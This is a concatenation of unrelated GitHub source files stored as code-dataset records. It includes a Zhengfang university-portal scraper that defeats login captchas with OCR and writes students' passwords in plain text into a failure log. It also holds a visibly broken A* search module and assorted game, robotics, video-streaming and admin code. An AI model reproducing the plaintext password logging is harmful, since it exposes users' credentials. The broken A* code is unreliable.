for i in range(2, 20):\n if i < 10:\n time_pre = soup.find(id=\"gv_ks_ctl\" + \"0\" + str(i) + \"_Label1\")\n time = (re.findall(r'_Label1\">(.*)', str(time_pre)))\n room_pre = soup.find(id=\"gv_ks_ctl\" + \"0\" + str(i) + \"_Label2\")\n room = (re.findall(r'_Label2\">(.*)', str(room_pre)))\n else:\n time_pre = soup.find(id=\"gv_ks_ctl\" + str(i) + \"_Label1\")\n time = (re.findall(r'_Label1\">(.*)', str(time_pre)))\n room_pre = soup.find(id=\"gv_ks_ctl\" + str(i) + \"_Label2\")\n room = (re.findall(r'_Label2\">(.*)', str(room_pre)))\n examTimeOrCourseTime_list.append(str(time)[2:-2])\n classroom_list.append(str(room)[2:-2])\n except AttributeError:\n pass\n time_list = []\n examTimeOrCourseTime_list_true = []\n for i, one in enumerate(examTimeOrCourseTime_list):\n if one != '':\n if one[0] != '*':\n time_list.append(i)\n else:\n examTimeOrCourseTime_list_true.append(one)\n examTimeOrCourseTime_list_true.reverse()\n classroom_list_true = []\n for j, one in enumerate(classroom_list):\n if len(time_list) == 0:\n if one != '':\n classroom_list_true.append(one)\n else:\n if j in time_list:\n continue\n else:\n if one != '':\n classroom_list_true.append(one)\n classroom_list_true.reverse()\n try:\n trs = soup.find(id=\"gv_ks\").findAll(\"tr\")[1:]\n except AttributeError:\n return []\n Exam_list = []\n for tr in trs:\n tds = tr.findAll(\"td\")\n oneExamKeys = [\n \"examIndex\",\n \"classSetDepartment\",\n \"electiveCourseNumber\",\n \"courseName\",\n \"startWeek\",\n \"endWeek\",\n \"examTimeOrCourseTime\",\n \"classroom\",\n \"seatNumber\",\n \"remark\",\n \"slowExamination\"\n ]\n oneExamValues = []\n for td in tds:\n if td.string == \"\\xa0\":\n td.string = ''\n oneExamValues.append(td.string)\n oneExam = {}\n oneExam[\"studentNumber\"] = studentNumber\n oneExam_temp = dict((key, value) for key, value in zip(oneExamKeys, oneExamValues))\n oneExam.update(oneExam_temp)\n if oneExam[\"seatNumber\"] == \"未排座位\":\n continue\n Exam_list.append(oneExam)\n for col in Exam_list:\n col[\"classroom\"] = classroom_list_true.pop()\n col[\"examTimeOrCourseTime\"] = examTimeOrCourseTime_list_true.pop()\n time_str = str(col[\"examTimeOrCourseTime\"])\n year = time_str[1:5]\n month = time_str.split(\"年\")[1].split(\"月\")[0]\n day = time_str.split(\"年\")[1].split(\"月\")[1].split(\"日\")[0]\n hour = time_str.split(\"(\")[1][0:2]\n minute = time_str.split(\":\")[1][0:2]\n exam_start_time = year + \"年\" + month + \"月\" + day + \"日\" + hour + \":\" + minute\n col[\"examTimeOrCourseTime\"] = exam_start_time\n while True:\n isExist = t_es_exam.get_or_none(t_es_exam.studentNumber == str(self.studentNumber))\n if isExist:\n s = t_es_exam.get(t_es_exam.studentNumber == str(self.studentNumber))\n s.delete_instance()\n else:\n break\n for each in Exam_list:\n single = t_es_exam(\n studentNumber=str(self.studentNumber),\n examIndex=each['examIndex'],\n classSetDepartment=each['classSetDepartment'],\n electiveCourseNumber=each['electiveCourseNumber'],\n courseName=each['courseName'],\n startWeek=each['startWeek'],\n endWeek=each['endWeek'],\n examTimeOrCourseTime=each['examTimeOrCourseTime'],\n classroom=each['classroom'],\n seatNumber=each['seatNumber'],\n remark=each['remark'],\n slowExamination=each['slowExamination'],\n )\n single.save(force_insert=True)\n return Exam_list\n\n\ndef go(studentNumber, studentPassword):\n start = time.clock()\n unsuccessful_list = pd.DataFrame(data=[])\n i = 0\n while i < 1:\n if 1:\n print()\n print('No.' + str(i))\n try:\n current_student = student(studentNumber, studentPassword)\n current_student.getCheckCodeImage()\n orginalCheckCode = identifyRandcode.identify_randcode(\n 'image/original_img.jpg',\n 'image/adjusted_img.jpg')\n checkCode = orginalCheckCode[0:5]\n current_student.login(checkCode)\n except IndexError:\n time.sleep(1)\n print('——PasswordOrRandcode Error——Again, KillRandcode——')\n try:\n current_student = student(studentNumber, studentPassword)\n current_student.getCheckCodeImage()\n orginalCheckCode = identifyRandcode.identify_randcode(\n 'image/original_img.jpg',\n 'image/adjusted_img.jpg')\n checkCode = orginalCheckCode[0:5]\n current_student.login(checkCode)\n except IndexError:\n time.sleep(1)\n reason = 'wrong password'\n print(reason)\n if reason == 'wrong password':\n return 4001\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n print(\"login successfully!\")\n try:\n Exam_list = current_student.getExam(studentNumber)\n except IndexError:\n reason = 'outside school'\n print(reason)\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n current_student.login_out()\n print(\"successfully!\")\n else:\n print(\"login successfully!\")\n try:\n Exam_list = current_student.getExam(studentNumber)\n except IndexError:\n reason = 'outside school'\n print(reason)\n error_info = t_unsuccessful_list(serialNumber=i, studentNumber=studentNumber,\n studentPassword=studentPassword, reason=reason)\n error_info.save()\n else:\n current_student.login_out()\n print(\"successfully!\")\n else:\n pass\n i = i + 1\n end = time.clock()\n print(end - start)\n t_exam = dict(\n {\n 'exam': Exam_list\n }\n )\n return t_exam\n","repo_name":"Feuoy/zhengfang-spider","sub_path":"go/table_exam.py","file_name":"table_exam.py","file_ext":"py","file_size_in_byte":13433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"39445326542","text":"from django.utils.translation import gettext_lazy as _\n\nfrom django_tables2 import TemplateColumn, A, Column\n\nfrom champsquarebackend.core.loading import get_model, get_class\n\nDashboardTable = get_class('dashboard.tables', 'DashboardTable')\nVideoRecord = get_model('monitoring', 'videorecord')\n\n\nclass VideoRecordTable(DashboardTable):\n id = TemplateColumn(\n verbose_name=_('Id'),\n template_name='champsquarebackend/dashboard/records/videos_row_id.html',\n orderable=False\n )\n\n user = TemplateColumn(\n verbose_name=_('User'),\n template_name='champsquarebackend/dashboard/records/videos_row_user.html',\n orderable=False\n )\n\n type = Column(\n verbose_name=_('Type'),\n orderable=True, accessor=('type')\n )\n\n start_time = Column(\n verbose_name=_('Start Time'),\n orderable=True, accessor=('created_at')\n )\n\n is_processed = Column(\n verbose_name=_('Is Processed?'),\n orderable=True, accessor=('is_processed'))\n\n actions = TemplateColumn(\n verbose_name=_('Actions'),\n template_name='champsquarebackend/dashboard/records/videos_row_actions.html',\n orderable=False)\n\n icon = \"group\"\n\n class Meta(DashboardTable.Meta):\n model = VideoRecord\n fields = ()\n sequence = ('counter', 'id', 'user', 'type', 'start_time', 'is_processed', 'actions')\n","repo_name":"ChampSquare/ChampionSquareBackend","sub_path":"champsquarebackend/apps/dashboard/records/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10759483964","text":"from __future__ import annotations\n\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom typing import MutableSequence, Protocol, TypeVar, Sequence\n\nfrom range_typed_integers import u8, u16, u32\n\nfrom skytemple_files.common.i18n_util import _\nfrom skytemple_files.container.sir0.sir0_serializable import Sir0Serializable\n\n\n_WazaMoveCategory = u8\n_PokeType = u8\n\n\nclass WazaMoveCategory(Enum):\n PHYSICAL = 0, _(\"Physical Move\")\n SPECIAL = 1, _(\"Special Move\")\n STATUS = 2, _(\"Status Move\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveCategory.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeTarget(Enum):\n ENEMIES = 0, _(\"Enemies\")\n ALLIES = 1, _(\"Allies\")\n EVERYONE = 2, _(\"Everyone\")\n USER = 3, _(\"User\")\n TWO_TURN = 4, _(\"Two-turn move\")\n EVERYONE_EXCEPT_USER = 5, _(\"Everyone except user\")\n ALLIES_EXCEPT_USER = 6, _(\"All allies except user\")\n U7 = 7, _(\"Invalid \") + \"7\"\n U8 = 8, _(\"Invalid \") + \"8\"\n U9 = 9, _(\"Invalid \") + \"9\"\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n SPECIAL = 15, _(\"Special / Invalid\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeTarget.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeRange(Enum):\n IN_FRONT = 0, _(\"In front\")\n TRHEE_IN_FRONT = 1, _(\"In front + adjacent (like Wide Slash)\")\n AROUND = 2, _(\"8 tiles around user\")\n ROOM = 3, _(\"Room\")\n TWO_TILES = 4, _(\n \"Two tiles away\"\n ) # Also cuts corners, but the AI doesn't account for that\n STRAIGHT_LINE = 5, _(\"Straight line\")\n FLOOR = 6, _(\"Floor\")\n USER = 7, _(\"User\")\n IN_FRONT_CORNERS = 8, _(\"In front; cuts corners\")\n TWO_TILES_CORNERS = 9, _(\"Two tiles away; cuts corners\")\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n SPECIAL = 15, _(\"Special / Invalid\")\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeRange.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass WazaMoveRangeCondition(Enum):\n \"\"\"Only relevant for AI setting.\"\"\"\n\n NO_CONDITION = 0, _(\"No condition\")\n CHANCE_AI_WEIGHT = 1, _(\"Based on AI Condition 1 Chance\")\n CRITICAL_HP = 2, _(\"Current HP <= 25%\")\n NEGATIVE_STATUS = 3, _(\"Has at least one negative status condition\")\n ASLEEP = 4, _(\"Is asleep, in a nightmare or napping\")\n GHOST = 5, _(\"Is a ghost-type Pokémon and does not have the exposed status\")\n CRITICAL_HP_NEGATIVE_STATUS = 6, _(\n \"Current HP <= 25% or has at least one negative status condition\"\n )\n U7 = 7, _(\"Invalid \") + \"7\"\n U8 = 8, _(\"Invalid \") + \"8\"\n U9 = 9, _(\"Invalid \") + \"9\"\n U10 = 10, _(\"Invalid \") + \"10\"\n U11 = 11, _(\"Invalid \") + \"11\"\n U12 = 12, _(\"Invalid \") + \"12\"\n U13 = 13, _(\"Invalid \") + \"13\"\n U14 = 14, _(\"Invalid \") + \"14\"\n U15 = 15, _(\"Invalid \") + \"15\"\n\n def __new__(cls, *args, **kwargs): # type: ignore\n obj = object.__new__(cls)\n obj._value_ = args[0]\n return obj\n\n # ignore the first param since it's already set by __new__\n def __init__(self, _: int, name_localized: str):\n self.name_localized = name_localized\n\n def __str__(self):\n return f\"WazaMoveRangeCondition.{self.name}\"\n\n def __repr__(self):\n return str(self)\n\n @property\n def print_name(self):\n return self.name_localized\n\n\nclass LevelUpMoveProtocol(Protocol):\n move_id: u16\n level_id: u16\n\n @abstractmethod\n def __init__(self, move_id: u16, level_id: u16):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nLUM = TypeVar(\"LUM\", bound=LevelUpMoveProtocol)\n\n\nclass MoveLearnsetProtocol(Protocol[LUM]):\n level_up_moves: MutableSequence[LUM]\n tm_hm_moves: MutableSequence[u32]\n egg_moves: MutableSequence[u32]\n\n @abstractmethod\n def __init__(\n self,\n level_up_moves: Sequence[LUM],\n tm_hm_moves: Sequence[u32],\n egg_moves: Sequence[u32],\n ):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nclass WazaMoveRangeSettingsProtocol(Protocol):\n target: int\n range: int\n condition: int\n unused: int\n\n @abstractmethod\n def __init__(self, data: bytes):\n ...\n\n @abstractmethod\n def __int__(self):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nR = TypeVar(\"R\", bound=WazaMoveRangeSettingsProtocol)\n\n\nclass WazaMoveProtocol(Protocol[R]):\n base_power: u16\n type: _PokeType\n category: _WazaMoveCategory\n settings_range: R\n settings_range_ai: R\n base_pp: u8\n ai_weight: u8\n miss_accuracy: u8\n accuracy: u8\n ai_condition1_chance: u8\n number_chained_hits: u8\n max_upgrade_level: u8\n crit_chance: u8\n affected_by_magic_coat: bool\n is_snatchable: bool\n uses_mouth: bool\n ai_frozen_check: bool\n ignores_taunted: bool\n range_check_text: u8\n move_id: u16\n message_id: u8\n\n @abstractmethod\n def __init__(self, data: bytes):\n ...\n\n @abstractmethod\n def to_bytes(self) -> bytes:\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n\n\nM = TypeVar(\"M\", bound=WazaMoveProtocol)\nL = TypeVar(\"L\", bound=MoveLearnsetProtocol)\n\n\nclass WazaPProtocol(Sir0Serializable, Protocol[M, L]):\n moves: MutableSequence[M]\n learnsets: MutableSequence[L]\n\n @abstractmethod\n def __init__(self, data: bytes, waza_content_pointer: int):\n ...\n\n @abstractmethod\n def __eq__(self, other: object) -> bool:\n ...\n","repo_name":"SkyTemple/skytemple-files","sub_path":"skytemple_files/data/waza_p/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":6917,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"15080632621","text":"#def heuristic(node, goal): # Calculates the admissible heuristic of a node\r\n # I know the format is [X,Y]\r\n # node = node.replace('[', '') # remove brackets\r\n # node = node.replace(']', '')\r\n # x, y = node.split(',', maxsplit=2) # Split values by ,\r\n #x = float(x)\r\n #y = float(y)\r\n #return abs(x - 9) + abs(y - 9) # Return calculation of admissible heuristic (manhattan distance)\r\nfrom queue import PriorityQueue\r\n\r\ndef heuristic(nxobject, node, goal):\r\n neighbours = nxobject.neighbors(node['label'])\r\n for n in neighbours:\r\n out_zone = nxobject[node['label']][n]['main_zone']\r\n if goal == out_zone:\r\n out_weight = out_weight - 2\r\n nxobject[node['label']][n]['weight'] = out_weight\r\n\r\n return None\r\n\r\n\r\ndef Astar(nxobject, initial, goal):\r\n admissible_heuristics = {} # Will save the values of h so i don't need to calculate multiple times for every node\r\n h = heuristic(initial)\r\n admissible_heuristics[initial] = h\r\n visited_nodes = {} # This will contain the data of how to get to any node\r\n visited_nodes[initial] = (h, [\r\n initial]) # I add the data for the origin node: \"Travel cost + heuristic\", \"Path to get there\" and \"Admissible Heuristic\"\r\n\r\n paths_to_explore = PriorityQueue()\r\n paths_to_explore.put((h, [initial], 0)) # Add the origin node to paths to explore, also add cost without h\r\n # I add the total cost, as well as the path to get there (they will be sorted automatically)\r\n\r\n while not paths_to_explore.empty(): # While there are still paths to explore\r\n # Pop elemenet with lower path cost in the queue\r\n _, path, total_cost = paths_to_explore.get()\r\n current_node = path[-1]\r\n neighbors = nxobject.neighbors(current_node) # I get all the neighbors of the current path\r\n\r\n for neighbor in neighbors:\r\n edge_data = nxobject.get_edge_data(path[-1], neighbor)\r\n if \"weight\" in edge_data:\r\n cost_to_neighbor = edge_data[\"weight\"] # If the graph has weights\r\n else:\r\n cost_to_neighbor = 1 # If the graph does not have weights I use 1\r\n\r\n if neighbor in admissible_heuristics:\r\n h = admissible_heuristics[neighbor]\r\n else:\r\n h = heuristic(neighbor)\r\n admissible_heuristics[neighbor] = h\r\n\r\n new_cost = total_cost + cost_to_neighbor\r\n new_cost_plus_h = new_cost + h\r\n if (neighbor not in visited_nodes) or (visited_nodes[neighbor][\r\n 0] > new_cost_plus_h): # If this node was never explored, or the cost to get there is better than te previous ones\r\n next_node = (new_cost_plus_h, path + [neighbor], new_cost)\r\n visited_nodes[neighbor] = next_node # Update the node with best value\r\n paths_to_explore.put(next_node) # Also will add it as a possible path to explore\r\n\r\n return visited_nodes[goal] # I will return the goal information, it will have both the total cost and the path\r\n\r\nimport bisect\r\n\r\ndef abstract():\r\n import inspect\r\n caller = inspect.getouterframes(inspect.currentframe())[1][3]\r\n raise NotImplementedError(caller + ' must be implemented in subclass')\r\n\r\ndef todo():\r\n raise NotImplementedError('You must complete the implementation.')\r\n\r\nclass Queue:\r\n \"\"\"Queue is an abstract class/interface. There are three types:\r\n FIFOQueue(): A First In First Out Queue.\r\n LIFOQueue(): A Last In First Out Queue.\r\n PriorityQueue(order, f): Queue in sorted order (default min-first).\r\n Each type supports the following methods and functions:\r\n q.append(item) -- add an item to the queue\r\n q.pop() -- return the top item from the queue\r\n len(q) -- number of items in q (also q.__len())\r\n item in q -- does q contain item?\r\n \"\"\"\r\n\r\n def append(self, item):\r\n abstract()\r\n\r\n def pop(self):\r\n abstract()\r\n\r\n\r\n\r\n\r\n\r\nclass PriorityQueue(Queue):\r\n \"\"\"A queue in which the minimum element (as determined by cost_function)\r\n is returned first. Also supports dict-like lookup.\r\n \"\"\"\r\n\r\n def __init__(self, cost_function=lambda x: x):\r\n self.A = []\r\n self.cost_function = cost_function\r\n\r\n def append(self, item):\r\n bisect.insort(self.A, (self.cost_function(item), item))\r\n\r\n def pop(self):\r\n return self.A.pop(0)[1]\r\n\r\n def __contains__(self, item):\r\n for _, x in self.A:\r\n if item == x:\r\n return True\r\n return False\r\n\r\n def __len__(self):\r\n return len(self.A)\r\n\r\n def __repr__(self):\r\n \"\"\"Return [A[0], A[1], ...]\"\"\"\r\n\r\n rep = \"[\"\r\n rep += str(self.A[0][1]) + \":\" + str(self.A[0][0])\r\n for i in range(1, len(self.A)):\r\n rep += \", \" + str(self.A[i][1]) + \":\" + str(self.A[i][0])\r\n\r\n rep += \"]\"\r\n\r\n return rep\r\n\r\n # For dict-like operations\r\n def __getitem__(self, key):\r\n for _, item in self.A:\r\n if item == key:\r\n return item\r\n\r\n def __delitem__(self, key):\r\n for i, (_, item) in enumerate(self.A):\r\n if item == key:\r\n self.A.pop(i)\r\n return\r\n\r\n\r\nclass Node:\r\n \"\"\"A node in a search tree. Contains a pointer to the parent (the node\r\n that this is a successor of) and to the actual state for this node. Note\r\n that if a state is arrived at by two paths, then there are two nodes with\r\n the same state. Also includes the action that got us to this state, and\r\n the total path_cost (also known as g) to reach the node. You will not need to\r\n subclass this class.\"\"\"\r\n\r\n def __init__(self, state, parent=None, action=None, path_cost=0):\r\n \"Create a search tree Node, derived from a parent by an action.\"\r\n\r\n self.state = state\r\n self.parent = parent\r\n self.action = action\r\n self.path_cost = path_cost\r\n\r\n self.depth = 0\r\n if parent:\r\n self.depth = parent.depth + 1\r\n\r\n def __repr__(self):\r\n return \"\" % (self.state,)\r\n\r\n def __lt__(self, node):\r\n return self.state < node.state\r\n\r\n def expand(self, problem):\r\n \"List the nodes reachable in one step from this node.\"\r\n return [self.child_node(problem, action)\r\n for action in problem.actions(self.state)]\r\n\r\n def child_node(self, problem, action):\r\n \"Fig. 3.10\"\r\n next_node = problem.result(self.state, action)\r\n return Node(next_node, self, action,\r\n problem.path_cost(self.path_cost, self.state, action, next_node))\r\n\r\n def solution(self):\r\n \"Return the sequence of actions to go from the root to this node.\"\r\n return [node.action for node in self.path()[1:]]\r\n\r\n def path(self):\r\n \"Return a list of nodes forming the path from the root to this node.\"\r\n node, path_back = self, []\r\n while node:\r\n path_back.append(node)\r\n node = node.parent\r\n return list(reversed(path_back))\r\n\r\n # We want for a queue of nodes in breadth_first_search or\r\n # astar_search to have no duplicated states, so we treat nodes\r\n # with the same state as equal. [Problem: this may not be what you\r\n # want in other contexts.]\r\n\r\n def __eq__(self, other):\r\n return isinstance(other, Node) and self.state == other.state\r\n\r\n def __hash__(self):\r\n return hash(self.state)\r\n\r\n\r\ndef best_first_tree_search(nxobject, cost_function):\r\n \"\"\"Search the nodes with the lowest cost_function scores first.\r\n You specify the function cost_function(node) that you want to minimize\r\n \"\"\"\r\n node = Node(nxobject.initial)\r\n if nxobject.goal_test(node.state):\r\n return node\r\n frontier = PriorityQueue(cost_function)\r\n frontier.append(node)\r\n while frontier:\r\n node = frontier.pop()\r\n if nxobject.goal_test(node.state):\r\n return node\r\n for child in node.expand(nxobject):\r\n frontier.append(child)\r\n return None\r\n\r\n\r\ndef best_first_graph_search(nxobject, cost_function):\r\n \"\"\"Search the nodes with the lowest cost_function scores first.\r\n You specify the function cost_function(node) that you want to minimize.\r\n Remember the states you have explored and generated.\r\n \"\"\"\r\n node = Node(nxobject.initial)\r\n if nxobject.goal_test(node.state):\r\n return node\r\n frontier = PriorityQueue(cost_function)\r\n frontier.append(node)\r\n explored = set()\r\n while frontier:\r\n node = frontier.pop()\r\n if nxobject.goal_test(node.state):\r\n return node\r\n explored.add(node.state)\r\n for child in node.expand(nxobject):\r\n if child.state not in explored and child not in frontier:\r\n frontier.append(child)\r\n elif child in frontier:\r\n incumbent = frontier[child]\r\n if cost_function(child) < cost_function(incumbent): # Check if a better path is found\r\n del frontier[incumbent]\r\n frontier.append(child)\r\n return None\r\n\r\n\r\ndef greedy_best_first_search(problem, h, search_type=best_first_tree_search):\r\n return search_type(problem, lambda node: h(node))\r\n\r\n\r\ndef astar_search(problem, h, search_type=best_first_tree_search):\r\n return search_type(problem, lambda node: node.path_cost + h(node))","repo_name":"Palak-Dhanadia/Artificial-Intelligence","sub_path":"Assignment 1/Code/Heuristic.py","file_name":"Heuristic.py","file_ext":"py","file_size_in_byte":9507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40568979798","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef getProMPBasis(dt, nSteps, n_of_basis, bandwidth):\n # (2, 1499)\n time = np.arange(dt, nSteps * dt, dt)\n nBasis = n_of_basis\n T = nSteps * dt\n\n C = np.random.uniform(-2*bandwidth, T+2*bandwidth, nBasis)\n\n #X = 1 # Canonical system\n Phi = np.zeros((nSteps, nBasis))\n\n for k in range(nSteps):\n for j in range(nBasis):\n Phi[k, j] = np.exp(-0.5 * (time[k] - C[j]) ** 2/bandwidth ** 2) # Basis function activation over time\n Phi[k, :] = (Phi[k, :] * time[k]) / np.sum(Phi[k, :]) # Normalize basis functions and weight by canonical state\n\n return Phi\n\n#show the basis functions\n# dt = 0.002\n# nSteps = 1499\n# N = 30\n# bandwidth = 0.2\n# time = np.arange(dt, nSteps * dt, dt)\n# Phi = getProMPBasis(dt, nSteps, N, bandwidth)\n# print(Phi)\n# plt.plot(time, Phi)\n# plt.savefig('f_basis.pdf')\n# #plt.legend()\n# plt.show()\n","repo_name":"smallsmallstrong/Exercise-Robot-Learning","sub_path":"HW4/getProMPBasis.py","file_name":"getProMPBasis.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71941028839","text":"import argparse\r\nimport asyncio\r\nimport struct\r\nfrom asyncio import Queue\r\nfrom collections import deque\r\n\r\nfrom aioquic.asyncio import serve\r\nfrom aioquic.quic.configuration import QuicConfiguration\r\nfrom src.structures.queues import StrictPriorityQueue, WeightedFairQueue\r\nfrom src.structures.data_types import VideoRequestMessage, VideoPacket\r\nfrom src.utils import message_to_quic_packet, get_server_file_name, server_file_exists\r\nfrom src.constants.video_constants import CLOSE_REQUEST, TILE_REQUEST, PUSH_REQUEST, WFQ_QUEUE, SP_QUEUE, \\\r\n N_SEGMENTS, PUSH_CANCEL, HIGHEST_PRIORITY, PUSH_RECEIVED, INITIAL_BUFFER_SIZE\r\n\r\n\r\ndef handle_stream(reader, writer):\r\n asyncio.ensure_future(handle_echo(reader, writer))\r\n\r\n\r\nasync def handle_echo(reader, writer):\r\n closed = False\r\n\r\n if Queue_Type == WFQ_QUEUE:\r\n queue = WeightedFairQueue()\r\n elif Queue_Type == SP_QUEUE:\r\n queue = StrictPriorityQueue()\r\n else:\r\n queue = Queue()\r\n\r\n name = await reader.read(1024)\r\n\r\n print(\"Connection with \"+str(name.decode()))\r\n\r\n asyncio.ensure_future(receive(reader, queue))\r\n while not closed:\r\n video_request = await queue.get()\r\n if video_request.message_type == CLOSE_REQUEST:\r\n closed = True\r\n else:\r\n await send(video_request, writer)\r\n\r\n\r\nasync def receive(reader, queue):\r\n last_segment = 1\r\n tiles_priority = deque()\r\n previous_tiles_priority = deque()\r\n segment = 1\r\n closed = False\r\n is_pushing = False\r\n\r\n sent_segments = [False for i in range(1, N_SEGMENTS+1)]\r\n\r\n is_push_allowed = Server_Push\r\n\r\n while not closed:\r\n try:\r\n read_data = await asyncio.wait_for(reader.readexactly(4), timeout=0.005)\r\n size, = struct.unpack('= user[1]: # 이모티콘 구매 비용이 넘어가면\n subscriber += 1 # 이모티콘 플러스 서비스에 가입\n else:\n sales += emo_sum\n answer.append([subscriber, sales]) # 일단 모든 경우의 수 다 넣어놓고\n answer = max(i for i in answer) # 정렬\n return answer","repo_name":"jun6292/Algorithm","sub_path":"프로그래머스/unrated/150368. 이모티콘 할인행사/이모티콘 할인행사.py","file_name":"이모티콘 할인행사.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"12205426373","text":"#!/usr/bin/env python3\n\nfrom collections import deque, namedtuple\nfrom hashlib import md5\n\n\ndirns = ((b'U', 0, -1),\n (b'D', 0, 1),\n (b'L', -1, 0),\n (b'R', 1, 0))\n\nNode = namedtuple('Node', ('letter', 'x', 'y'))\nPath = namedtuple('Path', ('nodes', 'hash'))\n\n\ndef path_to_str(path):\n return ''.join(p.letter.decode() for p in path.nodes)\n\n\ndef grow_path(path, xdel, ydel, dirn, hexit):\n last = path.nodes[-1]\n x, y = last.x + xdel, last.y + ydel\n if not (0 <= x < 4 and 0 <= y < 4 and\n hexit >= 'b'):\n return None\n\n new_hash = path.hash.copy()\n new_hash.update(dirn)\n return Path(nodes=path.nodes + [Node(dirn, x, y)], hash=new_hash)\n\n\ndef run(pwd, expected=None):\n root_hash = md5()\n root_hash.update(pwd.encode())\n start = Path(nodes=[Node(b'', 0, 0)], hash=root_hash)\n frontier = deque()\n frontier.append(start)\n\n while True:\n path = frontier.popleft()\n last = path.nodes[-1]\n if (last.x, last.y) == (3, 3):\n break\n\n hexits = path.hash.hexdigest()[:4]\n for (dirn, xdel, ydel), hexit in zip(dirns, hexits):\n new_path = grow_path(path, xdel, ydel, dirn, hexit)\n if new_path is not None:\n frontier.append(new_path)\n\n path = path_to_str(path)\n print('%s -> %s' % (pwd, path))\n if expected is not None and expected != path:\n print('%s != %s' % (path, expected))\n raise AssertionError('Unexpected output')\n\n\ntry:\n run('hijkl')\n raise AssertionError('This password should not work')\nexcept IndexError:\n pass\n\nrun('ihgpwlah', 'DDRRRD')\nrun('kglvqrro', 'DDUDRLRRUDRD')\nrun('ulqzkmiv', 'DRURDRUDDLLDLUURRDULRLDUUDDDRR')\nrun('pxxbnzuo')\n","repo_name":"reinderien/advent","sub_path":"2016/17/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"33"} +{"seq_id":"19853322341","text":"from __future__ import absolute_import\n\nimport copy\nimport inspect\nimport re\nimport sys\nimport time\nimport traceback\nfrom ipaddress import IPv4Address, IPv6Address, ip_address, ip_network\nfrom typing import Any, Dict, Iterable, List, Optional, Set, Text, Tuple, Union # noqa: F401\n\nimport ldap\nimport six\nfrom ldap.controls.readentry import PostReadControl\nfrom ldap.dn import dn2str, escape_dn_chars, explode_rdn, str2dn\nfrom ldap.filter import filter_format\n\nimport univention.admin.filter\nimport univention.admin.localization\nimport univention.admin.mapping\nimport univention.admin.modules\nimport univention.admin.syntax\nimport univention.admin.uexceptions\nimport univention.admin.uldap\nimport univention.debug as ud\nfrom univention.admin import configRegistry\nfrom univention.admin.uldap import DN\nfrom univention.admindiary.client import write_event\nfrom univention.admindiary.events import DiaryEvent\n\n\ntry:\n import univention.lib.admember\n _prevent_to_change_ad_properties = univention.lib.admember.is_localhost_in_admember_mode()\nexcept ImportError:\n ud.debug(ud.ADMIN, ud.WARN, \"Failed to import univention.lib.admember\")\n _prevent_to_change_ad_properties = False\n\ngetfullargspec = getattr(inspect, 'getfullargspec', getattr(inspect, 'getargspec', None))\n\n_Attributes = Dict[Text, Union[bytes, List[bytes]]]\n_Properties = Dict[Text, Union[Text, List[Text]]]\n\ntranslation = univention.admin.localization.translation('univention/admin/handlers')\n_ = translation.translate\n\n# global caching variable\nif configRegistry.is_true('directory/manager/samba3/legacy', False):\n s4connector_present = False # type: Optional[bool]\nelif configRegistry.is_false('directory/manager/samba3/legacy', False):\n s4connector_present = True\nelse:\n s4connector_present = None\n\n\ndef disable_ad_restrictions(disable=True): # type: (bool) -> None\n global _prevent_to_change_ad_properties\n _prevent_to_change_ad_properties = disable\n\n\nclass simpleLdap(object):\n \"\"\"\n The base class for all UDM handler modules.\n\n :param co:\n *deprecated* parameter for a config. Please pass `None`.\n :type co: None\n\n :param lo:\n A required LDAP connection object which is used 